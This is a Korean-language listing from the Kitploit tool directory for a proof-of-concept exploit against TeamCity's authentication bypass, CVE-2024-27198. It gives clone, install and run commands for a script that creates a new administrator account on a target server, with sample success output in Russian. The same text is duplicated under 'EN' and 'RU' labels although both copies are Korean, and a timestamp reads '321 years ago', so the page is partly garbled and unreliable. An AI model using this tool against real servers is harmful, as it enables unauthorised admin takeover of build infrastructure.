Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/geniuszly/cve-2024-27198
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

는 TeamCity 서버의 취약점(CVE-2024-27198)을 대상으로 하는 PoC 도구입니다

저장소 보기
321년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

EN

GenTeamCityExploit은 TeamCity 서버의 취약점(CVE-2024-27198)을 대상으로 하는 PoC 도구입니다. 인증 우회 결함을 악용하여 TeamCity 버전을 식별하고 새 관리자 사용자를 생성할 수 있습니다.

기능

  • TeamCity 서버의 버전을 추출합니다.
  • 알려진 취약점(CVE-2024-27198)의 존재 여부를 확인합니다.
  • 서버가 취약한 경우 새 관리자 사용자를 생성합니다.

사전 요구 사항

  • Python 3.6+: Python이 설치되어 있는지 확인하세요.
  • 라이브러리: 다음 명령을 사용하여 필요한 라이브러리를 설치하세요:
    root@kitploit:~
    pip install requests urllib3
    

사용법

  1. 저장소를 클론합니다.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. 디렉터리로 이동합니다.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. 필수 매개변수를 지정하여 스크립트를 실행합니다.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    매개변수:
    • -t, --target: 대상 TeamCity 서버의 URL입니다.
    • -u, --username: 새 관리자 사용자의 사용자 이름입니다.
    • -p, --password: 새 관리자 사용자의 비밀번호입니다.

예시

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

출력 예시

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

서버가 취약하지 않거나 버전을 찾을 수 없는 경우:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

서버에 연결하는 중 오류가 발생한 경우:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

면책 조항

이 도구는 교육 목적으로만 제공되며 소유자의 명시적 허가 없이 어떤 시스템에도 사용해서는 안 됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다.

RU

GenTeamCityExploit은 TeamCity 서버의 취약점(CVE-2024-27198)을 대상으로 하는 PoC 도구입니다. 인증 우회 취약점을 악용하여 TeamCity 버전을 식별하고 새 관리자를 생성할 수 있습니다.

기능

  • TeamCity 서버의 버전을 추출합니다.
  • 알려진 취약점(CVE-2024-27198)의 존재 여부를 확인합니다.
  • 서버가 취약한 경우 새 관리자 사용자를 생성합니다.

요구 사항

  • Python 3.6+: Python이 설치되어 있는지 확인하세요.
  • 라이브러리: 다음 명령으로 필요한 라이브러리를 설치하세요:
    root@kitploit:~
    pip install requests urllib3
    

사용법

  1. 저장소를 클론합니다.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. 프로젝트 폴더로 이동합니다.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. 필수 매개변수를 지정하여 스크립트를 실행합니다.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    매개변수:
    • -t, --target: 대상 TeamCity 서버의 URL입니다.
    • -u, --username: 새 관리자의 사용자 이름입니다.
    • -p, --password: 새 관리자의 비밀번호입니다.

예시

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

출력 예시

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

서버가 취약하지 않거나 버전을 찾을 수 없는 경우:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

서버 연결 중 오류가 발생한 경우:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

면책 조항

이 도구는 교육 목적으로만 제공되며 소유자의 명시적 허가 없이 어떤 시스템에도 사용해서는 안 됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다.

도구 다운로드